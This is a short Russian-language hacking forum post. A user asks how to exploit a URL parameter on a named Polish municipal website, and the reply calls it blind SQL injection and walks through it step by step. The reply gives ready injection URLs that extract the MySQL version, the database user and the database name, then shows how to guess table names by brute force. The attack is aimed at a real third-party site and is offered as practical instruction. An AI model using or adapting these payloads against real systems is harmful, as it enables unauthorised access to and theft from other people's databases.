04.11.2011, 19:27
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от vaddd
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4%20order%20by %20123
как такое крутить? почему при order by 123 нет ошибки?
Тут Blind SQL
Крутить так:
Код:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+substring((version()),1,1)=4
4-ая версия. Печально.
Код:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+ascii(substring((user()),1,1))=109
User = mup@localhost
Код:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+ascii(substring((database()),1,1))=112
Database = praca
Теперь подбирай таблички так:
Код:
http://www.mup.lublin.pl/db/popup.php?action=results&poll_ident=4+and+exists(select+count(*)+from+praca.НАЗВАНИЕ_ТАБЛИЧКИ)
Если страничка отобразится нормально - ты подобрал =)
|
|
|